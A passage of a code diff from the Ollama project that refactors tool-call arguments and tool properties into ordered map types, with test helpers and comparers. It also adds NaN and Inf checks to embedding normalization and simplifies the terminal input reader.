{Role: "assistant", Content: "I'll call double(1) and triple(2) for you.", ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{Name: "double", Arguments: map[string]any{"number": "1"}}},
|
||||
{Function: api.ToolCallFunction{Name: "triple", Arguments: map[string]any{"number": "2"}}},
|
||||
{Function: api.ToolCallFunction{Name: "double", Arguments: testArgs(map[string]any{"number": "1"})}},
|
||||
{Function: api.ToolCallFunction{Name: "triple", Arguments: testArgs(map[string]any{"number": "2"})}},
|
||||
}},
|
||||
{Role: "tool", Content: "{\"number\": 2}", ToolName: "double"},
|
||||
{Role: "tool", Content: "{\"number\": 6}", ToolName: "triple"},
|
||||
},
|
||||
tools: []api.Tool{
|
||||
{Function: api.ToolFunction{Name: "double", Description: "Double a number", Parameters: api.ToolFunctionParameters{Properties: map[string]api.ToolProperty{
|
||||
{Function: api.ToolFunction{Name: "double", Description: "Double a number", Parameters: api.ToolFunctionParameters{Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"number": {Type: api.PropertyType{"string"}, Description: "The number to double"},
|
||||
}}}},
|
||||
{Function: api.ToolFunction{Name: "triple", Description: "Triple a number", Parameters: api.ToolFunctionParameters{Properties: map[string]api.ToolProperty{
|
||||
})}}},
|
||||
{Function: api.ToolFunction{Name: "triple", Description: "Triple a number", Parameters: api.ToolFunctionParameters{Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"number": {Type: api.PropertyType{"string"}, Description: "The number to triple"},
|
||||
}}}},
|
||||
})}}},
|
||||
},
|
||||
expected: `<|im_start|>system
|
||||
You are a helpful assistant with access to tools.
|
||||
|
|
@ -259,9 +259,9 @@ I'll tell you something interesting about cats`,
|
|||
{Role: "assistant", ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{
|
||||
Name: "echo",
|
||||
Arguments: map[string]any{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"payload": map[string]any{"foo": "bar"},
|
||||
},
|
||||
}),
|
||||
}},
|
||||
}},
|
||||
{Role: "tool", Content: "{\"payload\": {\"foo\": \"bar\"}}", ToolName: "echo"},
|
||||
|
|
|
|||
|
|
@ -337,7 +337,7 @@ Let me analyze this image.`,
|
|||
Role: "assistant",
|
||||
Content: "I'll check.",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: map[string]any{"location": "Paris", "unit": "celsius"}}},
|
||||
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}},
|
||||
},
|
||||
},
|
||||
{Role: "user", Content: "<tool_response>\n18\n</tool_response>"},
|
||||
|
|
@ -367,8 +367,8 @@ Thanks!<|im_end|>
|
|||
Role: "assistant",
|
||||
Content: "before",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{Name: "add", Arguments: map[string]any{"a": 2, "b": 3}}},
|
||||
{Function: api.ToolCallFunction{Name: "mul", Arguments: map[string]any{"x": 4, "y": 5}}},
|
||||
{Function: api.ToolCallFunction{Name: "add", Arguments: testArgsOrdered([]orderedArg{{"a", 2}, {"b", 3}})}},
|
||||
{Function: api.ToolCallFunction{Name: "mul", Arguments: testArgsOrdered([]orderedArg{{"x", 4}, {"y", 5}})}},
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -387,7 +387,7 @@ before
|
|||
name: "consecutive tool responses grouped",
|
||||
msgs: []api.Message{
|
||||
{Role: "user", Content: "Compute results"},
|
||||
{Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "job", Arguments: map[string]any{"n": 1}}}}},
|
||||
{Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "job", Arguments: testArgs(map[string]any{"n": 1})}}}},
|
||||
{Role: "tool", Content: "5", ToolName: "job"},
|
||||
{Role: "tool", Content: "6", ToolName: "job"},
|
||||
},
|
||||
|
|
@ -412,7 +412,7 @@ ok
|
|||
name: "last message is tool then prefill",
|
||||
msgs: []api.Message{
|
||||
{Role: "user", Content: "run"},
|
||||
{Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "exec", Arguments: map[string]any{"cmd": "ls"}}}}},
|
||||
{Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "exec", Arguments: testArgs(map[string]any{"cmd": "ls"})}}}},
|
||||
{Role: "tool", Content: "done", ToolName: "exec"},
|
||||
},
|
||||
expected: `<|im_start|>user
|
||||
|
|
@ -447,7 +447,7 @@ done
|
|||
Role: "assistant",
|
||||
Content: "I'll check.",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: map[string]any{"location": "Paris", "unit": "celsius"}}},
|
||||
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}},
|
||||
},
|
||||
},
|
||||
{Role: "user", Content: "<tool_response>\n18\n</tool_response>"},
|
||||
|
|
@ -477,7 +477,7 @@ Thanks!<|im_end|>
|
|||
Role: "assistant",
|
||||
Content: "I'll check.",
|
||||
ToolCalls: []api.ToolCall{
|
||||
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: map[string]any{"location": "Paris", "unit": "celsius"}}},
|
||||
{Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}},
|
||||
},
|
||||
},
|
||||
{Role: "user", Content: "\n\n\n\n<tool_response>\n18\n</tool_response> extra\n\n\n\n\n\n"},
|
||||
|
|
|
|||
|
|
@ -128,10 +128,10 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
|||
// {
|
||||
// Function: api.ToolCallFunction{
|
||||
// Name: "get-current-weather",
|
||||
// Arguments: map[string]any{
|
||||
// Arguments: testArgs(map[string]any{
|
||||
// "location": "New York",
|
||||
// "unit": "fahrenheit",
|
||||
// },
|
||||
// }),
|
||||
// },
|
||||
// },
|
||||
// },
|
||||
|
|
@ -148,7 +148,7 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
|||
// Parameters: api.ToolFunctionParameters{
|
||||
// Type: "object",
|
||||
// Required: []string{"location"},
|
||||
// Properties: map[string]api.ToolProperty{
|
||||
// Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
// "location": {
|
||||
// Type: api.PropertyType{"string"},
|
||||
// Description: "The city and state, e.g. San Francisco, CA",
|
||||
|
|
@ -158,7 +158,7 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
|||
// Enum: []any{"celsius", "fahrenheit"},
|
||||
// Description: "The temperature unit",
|
||||
// },
|
||||
// },
|
||||
// }),
|
||||
// },
|
||||
// },
|
||||
// },
|
||||
|
|
@ -216,19 +216,19 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
|||
// {
|
||||
// Function: api.ToolCallFunction{
|
||||
// Name: "add",
|
||||
// Arguments: map[string]any{
|
||||
// Arguments: testArgs(map[string]any{
|
||||
// "a": 2,
|
||||
// "b": 3,
|
||||
// },
|
||||
// }),
|
||||
// },
|
||||
// },
|
||||
// {
|
||||
// Function: api.ToolCallFunction{
|
||||
// Name: "multiply",
|
||||
// Arguments: map[string]any{
|
||||
// Arguments: testArgs(map[string]any{
|
||||
// "x": 4,
|
||||
// "y": 5,
|
||||
// },
|
||||
// }),
|
||||
// },
|
||||
// },
|
||||
// },
|
||||
|
|
@ -257,10 +257,10 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
|||
// Parameters: api.ToolFunctionParameters{
|
||||
// Type: "object",
|
||||
// Required: []string{"a", "b"},
|
||||
// Properties: map[string]api.ToolProperty{
|
||||
// Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
// "a": {Type: api.PropertyType{"integer"}, Description: "First number"},
|
||||
// "b": {Type: api.PropertyType{"integer"}, Description: "Second number"},
|
||||
// },
|
||||
// }),
|
||||
// },
|
||||
// },
|
||||
// },
|
||||
|
|
@ -272,10 +272,10 @@ Speak poetry after the first sentence.</think><think>Speak poetry after the seco
|
|||
// Parameters: api.ToolFunctionParameters{
|
||||
// Type: "object",
|
||||
// Required: []string{"x", "y"},
|
||||
// Properties: map[string]api.ToolProperty{
|
||||
// Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
// "x": {Type: api.PropertyType{"integer"}, Description: "First factor"},
|
||||
// "y": {Type: api.PropertyType{"integer"}, Description: "Second factor"},
|
||||
// },
|
||||
// }),
|
||||
// },
|
||||
// },
|
||||
// },
|
||||
|
|
|
|||
|
|
@ -0,0 +1,51 @@
|
|||
package renderers
|
||||
|
||||
import "github.com/ollama/ollama/api"
|
||||
|
||||
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
|
||||
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||
props := api.NewToolPropertiesMap()
|
||||
for k, v := range m {
|
||||
props.Set(k, v)
|
||||
}
|
||||
return props
|
||||
}
|
||||
|
||||
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
|
||||
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
for k, v := range m {
|
||||
args.Set(k, v)
|
||||
}
|
||||
return args
|
||||
}
|
||||
|
||||
// orderedArg represents a key-value pair for ordered argument creation
|
||||
type orderedArg struct {
|
||||
Key string
|
||||
Value any
|
||||
}
|
||||
|
||||
// testArgsOrdered creates ToolCallFunctionArguments with a specific key order
|
||||
func testArgsOrdered(pairs []orderedArg) api.ToolCallFunctionArguments {
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
for _, p := range pairs {
|
||||
args.Set(p.Key, p.Value)
|
||||
}
|
||||
return args
|
||||
}
|
||||
|
||||
// orderedProp represents a key-value pair for ordered property creation
|
||||
type orderedProp struct {
|
||||
Key string
|
||||
Value api.ToolProperty
|
||||
}
|
||||
|
||||
// testPropsOrdered creates a ToolPropertiesMap with a specific key order
|
||||
func testPropsOrdered(pairs []orderedProp) *api.ToolPropertiesMap {
|
||||
props := api.NewToolPropertiesMap()
|
||||
for _, p := range pairs {
|
||||
props.Set(p.Key, p.Value)
|
||||
}
|
||||
return props
|
||||
}
|
||||
|
|
@ -10,6 +10,20 @@ import (
|
|||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
|
||||
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
for k, v := range m {
|
||||
args.Set(k, v)
|
||||
}
|
||||
return args
|
||||
}
|
||||
|
||||
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value
|
||||
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
|
||||
return cmp.Equal(a.ToMap(), b.ToMap())
|
||||
})
|
||||
|
||||
const (
|
||||
prefix = `data:image/jpeg;base64,`
|
||||
image = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
|
||||
|
|
@ -159,9 +173,9 @@ func TestToToolCallsPreservesIDs(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 2,
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Seattle",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
|
|
@ -169,9 +183,9 @@ func TestToToolCallsPreservesIDs(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 7,
|
||||
Name: "get_time",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"timezone": "UTC",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
}
|
||||
|
|
@ -215,7 +229,7 @@ func TestToToolCallsPreservesIDs(t *testing.T) {
|
|||
t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
|
||||
}
|
||||
|
||||
if diff := cmp.Diff(original, toolCalls); diff != "" {
|
||||
if diff := cmp.Diff(original, toolCalls, argsComparer); diff != "" {
|
||||
t.Errorf("input tool calls mutated (-want +got):\n%s", diff)
|
||||
}
|
||||
}
|
||||
|
|
|
|||
|
|
@ -925,7 +925,7 @@ func TestResponsesStreamConverter_ToolCalls(t *testing.T) {
|
|||
ID: "call_abc",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -1800,7 +1800,7 @@ func TestResponsesStreamConverter_FunctionCallStatus(t *testing.T) {
|
|||
ID: "call_abc",
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{"city": "Paris"},
|
||||
Arguments: testArgs(map[string]any{"city": "Paris"}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
|
|||
|
|
@ -30,7 +30,7 @@ func (p *Prompt) placeholder() string {
|
|||
}
|
||||
|
||||
type Terminal struct {
|
||||
outchan chan rune
|
||||
reader *bufio.Reader
|
||||
rawmode bool
|
||||
termios any
|
||||
}
|
||||
|
|
@ -264,36 +264,21 @@ func NewTerminal() (*Terminal, error) {
|
|||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
t := &Terminal{
|
||||
outchan: make(chan rune),
|
||||
rawmode: true,
|
||||
termios: termios,
|
||||
if err := UnsetRawMode(fd, termios); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
go t.ioloop()
|
||||
t := &Terminal{
|
||||
reader: bufio.NewReader(os.Stdin),
|
||||
}
|
||||
|
||||
return t, nil
|
||||
}
|
||||
|
||||
func (t *Terminal) ioloop() {
|
||||
buf := bufio.NewReader(os.Stdin)
|
||||
|
||||
for {
|
||||
r, _, err := buf.ReadRune()
|
||||
if err != nil {
|
||||
close(t.outchan)
|
||||
break
|
||||
}
|
||||
t.outchan <- r
|
||||
}
|
||||
}
|
||||
|
||||
func (t *Terminal) Read() (rune, error) {
|
||||
r, ok := <-t.outchan
|
||||
if !ok {
|
||||
return 0, io.EOF
|
||||
r, _, err := t.reader.ReadRune()
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
|
||||
return r, nil
|
||||
}
|
||||
|
|
|
|||
|
|
@ -752,9 +752,15 @@ func (s *Server) EmbedHandler(c *gin.Context) {
|
|||
return err
|
||||
}
|
||||
// TODO: this first normalization should be done by the model
|
||||
embedding = normalize(embedding)
|
||||
embedding, err = normalize(embedding)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if req.Dimensions > 0 && req.Dimensions < len(embedding) {
|
||||
embedding = normalize(embedding[:req.Dimensions])
|
||||
embedding, err = normalize(embedding[:req.Dimensions])
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
embeddings[i] = embedding
|
||||
atomic.AddUint64(&totalTokens, uint64(tokenCount))
|
||||
|
|
@ -787,9 +793,12 @@ func (s *Server) EmbedHandler(c *gin.Context) {
|
|||
c.JSON(http.StatusOK, resp)
|
||||
}
|
||||
|
||||
func normalize(vec []float32) []float32 {
|
||||
func normalize(vec []float32) ([]float32, error) {
|
||||
var sum float32
|
||||
for _, v := range vec {
|
||||
if math.IsNaN(float64(v)) || math.IsInf(float64(v), 0) {
|
||||
return nil, errors.New("embedding contains NaN or Inf values")
|
||||
}
|
||||
sum += v * v
|
||||
}
|
||||
|
||||
|
|
@ -797,7 +806,7 @@ func normalize(vec []float32) []float32 {
|
|||
for i := range vec {
|
||||
vec[i] *= norm
|
||||
}
|
||||
return vec
|
||||
return vec, nil
|
||||
}
|
||||
|
||||
func (s *Server) EmbeddingsHandler(c *gin.Context) {
|
||||
|
|
@ -2395,4 +2404,3 @@ func filterThinkTags(msgs []api.Message, m *Model) []api.Message {
|
|||
}
|
||||
return msgs
|
||||
}
|
||||
|
||||
|
|
|
|||
|
|
@ -22,6 +22,29 @@ import (
|
|||
"github.com/ollama/ollama/ml"
|
||||
)
|
||||
|
||||
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests)
|
||||
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||
props := api.NewToolPropertiesMap()
|
||||
for k, v := range m {
|
||||
props.Set(k, v)
|
||||
}
|
||||
return props
|
||||
}
|
||||
|
||||
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
|
||||
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
for k, v := range m {
|
||||
args.Set(k, v)
|
||||
}
|
||||
return args
|
||||
}
|
||||
|
||||
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value
|
||||
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
|
||||
return cmp.Equal(a.ToMap(), b.ToMap())
|
||||
})
|
||||
|
||||
type mockRunner struct {
|
||||
llm.LlamaServer
|
||||
|
||||
|
|
@ -488,7 +511,7 @@ func TestGenerateChat(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"location"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The city and state",
|
||||
|
|
@ -497,7 +520,7 @@ func TestGenerateChat(t *testing.T) {
|
|||
Type: api.PropertyType{"string"},
|
||||
Enum: []any{"celsius", "fahrenheit"},
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -559,15 +582,15 @@ func TestGenerateChat(t *testing.T) {
|
|||
expectedToolCall := api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Seattle, WA",
|
||||
"unit": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
}
|
||||
|
||||
expectedToolCall.ID = gotToolCall.ID
|
||||
if diff := cmp.Diff(gotToolCall, expectedToolCall); diff != "" {
|
||||
if diff := cmp.Diff(gotToolCall, expectedToolCall, argsComparer); diff != "" {
|
||||
t.Errorf("tool call mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
@ -582,7 +605,7 @@ func TestGenerateChat(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"location"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The city and state",
|
||||
|
|
@ -591,7 +614,7 @@ func TestGenerateChat(t *testing.T) {
|
|||
Type: api.PropertyType{"string"},
|
||||
Enum: []any{"celsius", "fahrenheit"},
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -688,10 +711,10 @@ func TestGenerateChat(t *testing.T) {
|
|||
expectedToolCall := api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Seattle, WA",
|
||||
"unit": "celsius",
|
||||
},
|
||||
}),
|
||||
},
|
||||
}
|
||||
|
||||
|
|
@ -703,7 +726,7 @@ func TestGenerateChat(t *testing.T) {
|
|||
}
|
||||
|
||||
expectedToolCall.ID = finalToolCall.ID
|
||||
if diff := cmp.Diff(finalToolCall, expectedToolCall); diff != "" {
|
||||
if diff := cmp.Diff(finalToolCall, expectedToolCall, argsComparer); diff != "" {
|
||||
t.Errorf("final tool call mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
})
|
||||
|
|
@ -716,9 +739,9 @@ func TestGenerateChat(t *testing.T) {
|
|||
Name: "get_weather",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {Type: api.PropertyType{"string"}},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
|
|||
|
|
@ -29,12 +29,12 @@ func getTestTools() []api.Tool {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"location"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The city and state, e.g. San Francisco, CA",
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -46,12 +46,12 @@ func getTestTools() []api.Tool {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"expression"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"expression": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The mathematical expression to calculate",
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -185,9 +185,9 @@ func TestChatHarmonyParserStreamingRealtime(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "get_weather",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "San Francisco",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -211,9 +211,9 @@ func TestChatHarmonyParserStreamingRealtime(t *testing.T) {
|
|||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "calculate",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"expression": "2+2",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
|
|||
|
|
@ -723,15 +723,20 @@ func TestShow(t *testing.T) {
|
|||
|
||||
func TestNormalize(t *testing.T) {
|
||||
type testCase struct {
|
||||
input []float32
|
||||
input []float32
|
||||
expectError bool
|
||||
}
|
||||
|
||||
testCases := []testCase{
|
||||
{input: []float32{1}},
|
||||
{input: []float32{0, 1, 2, 3}},
|
||||
{input: []float32{0.1, 0.2, 0.3}},
|
||||
{input: []float32{-0.1, 0.2, 0.3, -0.4}},
|
||||
{input: []float32{0, 0, 0}},
|
||||
{input: []float32{1}, expectError: false},
|
||||
{input: []float32{0, 1, 2, 3}, expectError: false},
|
||||
{input: []float32{0.1, 0.2, 0.3}, expectError: false},
|
||||
{input: []float32{-0.1, 0.2, 0.3, -0.4}, expectError: false},
|
||||
{input: []float32{0, 0, 0}, expectError: false},
|
||||
{input: []float32{float32(math.NaN()), 0.2, 0.3}, expectError: true},
|
||||
{input: []float32{0.1, float32(math.NaN()), 0.3}, expectError: true},
|
||||
{input: []float32{float32(math.Inf(1)), 0.2, 0.3}, expectError: true},
|
||||
{input: []float32{float32(math.Inf(-1)), 0.2, 0.3}, expectError: true},
|
||||
}
|
||||
|
||||
isNormalized := func(vec []float32) (res bool) {
|
||||
|
|
@ -748,9 +753,18 @@ func TestNormalize(t *testing.T) {
|
|||
|
||||
for _, tc := range testCases {
|
||||
t.Run("", func(t *testing.T) {
|
||||
normalized := normalize(tc.input)
|
||||
if !isNormalized(normalized) {
|
||||
t.Errorf("Vector %v is not normalized", tc.input)
|
||||
normalized, err := normalize(tc.input)
|
||||
if tc.expectError {
|
||||
if err == nil {
|
||||
t.Errorf("Expected error for input %v, but got none", tc.input)
|
||||
}
|
||||
} else {
|
||||
if err != nil {
|
||||
t.Errorf("Unexpected error for input %v: %v", tc.input, err)
|
||||
}
|
||||
if !isNormalized(normalized) {
|
||||
t.Errorf("Vector %v is not normalized", tc.input)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
|
|
|
|||
|
|
@ -272,8 +272,8 @@ func (t *Template) Execute(w io.Writer, v Values) error {
|
|||
} else if !v.forceLegacy && slices.Contains(vars, "messages") {
|
||||
return t.Template.Execute(w, map[string]any{
|
||||
"System": system,
|
||||
"Messages": messages,
|
||||
"Tools": v.Tools,
|
||||
"Messages": convertMessagesForTemplate(messages),
|
||||
"Tools": convertToolsForTemplate(v.Tools),
|
||||
"Response": "",
|
||||
"Think": v.Think,
|
||||
"ThinkLevel": v.ThinkLevel,
|
||||
|
|
@ -373,6 +373,118 @@ func collate(msgs []api.Message) (string, []*api.Message) {
|
|||
return strings.Join(system, "\n\n"), collated
|
||||
}
|
||||
|
||||
// templateTools is a slice of templateTool that marshals to JSON.
|
||||
type templateTools []templateTool
|
||||
|
||||
func (t templateTools) String() string {
|
||||
bts, _ := json.Marshal(t)
|
||||
return string(bts)
|
||||
}
|
||||
|
||||
// templateTool is a template-compatible representation of api.Tool
|
||||
// with Properties as a regular map for template ranging.
|
||||
type templateTool struct {
|
||||
Type string `json:"type"`
|
||||
Items any `json:"items,omitempty"`
|
||||
Function templateToolFunction `json:"function"`
|
||||
}
|
||||
|
||||
type templateToolFunction struct {
|
||||
Name string `json:"name"`
|
||||
Description string `json:"description"`
|
||||
Parameters templateToolFunctionParameters `json:"parameters"`
|
||||
}
|
||||
|
||||
type templateToolFunctionParameters struct {
|
||||
Type string `json:"type"`
|
||||
Defs any `json:"$defs,omitempty"`
|
||||
Items any `json:"items,omitempty"`
|
||||
Required []string `json:"required,omitempty"`
|
||||
Properties map[string]api.ToolProperty `json:"properties"`
|
||||
}
|
||||
|
||||
// templateToolCall is a template-compatible representation of api.ToolCall
|
||||
// with Arguments as a regular map for template ranging.
|
||||
type templateToolCall struct {
|
||||
ID string
|
||||
Function templateToolCallFunction
|
||||
}
|
||||
|
||||
type templateToolCallFunction struct {
|
||||
Index int
|
||||
Name string
|
||||
Arguments map[string]any
|
||||
}
|
||||
|
||||
// templateMessage is a template-compatible representation of api.Message
|
||||
// with ToolCalls converted for template use.
|
||||
type templateMessage struct {
|
||||
Role string
|
||||
Content string
|
||||
Thinking string
|
||||
Images []api.ImageData
|
||||
ToolCalls []templateToolCall
|
||||
ToolName string
|
||||
ToolCallID string
|
||||
}
|
||||
|
||||
// convertToolsForTemplate converts Tools to template-compatible format.
|
||||
func convertToolsForTemplate(tools api.Tools) templateTools {
|
||||
if tools == nil {
|
||||
return nil
|
||||
}
|
||||
result := make(templateTools, len(tools))
|
||||
for i, tool := range tools {
|
||||
result[i] = templateTool{
|
||||
Type: tool.Type,
|
||||
Items: tool.Items,
|
||||
Function: templateToolFunction{
|
||||
Name: tool.Function.Name,
|
||||
Description: tool.Function.Description,
|
||||
Parameters: templateToolFunctionParameters{
|
||||
Type: tool.Function.Parameters.Type,
|
||||
Defs: tool.Function.Parameters.Defs,
|
||||
Items: tool.Function.Parameters.Items,
|
||||
Required: tool.Function.Parameters.Required,
|
||||
Properties: tool.Function.Parameters.Properties.ToMap(),
|
||||
},
|
||||
},
|
||||
}
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// convertMessagesForTemplate converts Messages to template-compatible format.
|
||||
func convertMessagesForTemplate(messages []*api.Message) []*templateMessage {
|
||||
if messages == nil {
|
||||
return nil
|
||||
}
|
||||
result := make([]*templateMessage, len(messages))
|
||||
for i, msg := range messages {
|
||||
var toolCalls []templateToolCall
|
||||
for _, tc := range msg.ToolCalls {
|
||||
toolCalls = append(toolCalls, templateToolCall{
|
||||
ID: tc.ID,
|
||||
Function: templateToolCallFunction{
|
||||
Index: tc.Function.Index,
|
||||
Name: tc.Function.Name,
|
||||
Arguments: tc.Function.Arguments.ToMap(),
|
||||
},
|
||||
})
|
||||
}
|
||||
result[i] = &templateMessage{
|
||||
Role: msg.Role,
|
||||
Content: msg.Content,
|
||||
Thinking: msg.Thinking,
|
||||
Images: msg.Images,
|
||||
ToolCalls: toolCalls,
|
||||
ToolName: msg.ToolName,
|
||||
ToolCallID: msg.ToolCallID,
|
||||
}
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// Identifiers walks the node tree returning any identifiers it finds along the way
|
||||
func Identifiers(n parse.Node) ([]string, error) {
|
||||
switch n := n.(type) {
|
||||
|
|
|
|||
|
|
@ -124,16 +124,21 @@ func (p *Parser) parseToolCall() *api.ToolCall {
|
|||
return nil
|
||||
}
|
||||
|
||||
var args map[string]any
|
||||
var argsMap map[string]any
|
||||
if found, i := findArguments(tool, p.buffer); found == nil {
|
||||
return nil
|
||||
} else {
|
||||
args = found
|
||||
argsMap = found
|
||||
if i > end {
|
||||
end = i
|
||||
}
|
||||
}
|
||||
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
for k, v := range argsMap {
|
||||
args.Set(k, v)
|
||||
}
|
||||
|
||||
tc := &api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: tool.Function.Name,
|
||||
|
|
|
|||
|
|
@ -9,6 +9,29 @@ import (
|
|||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
// argsComparer provides cmp options for comparing ToolCallFunctionArguments by value (order-insensitive)
|
||||
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
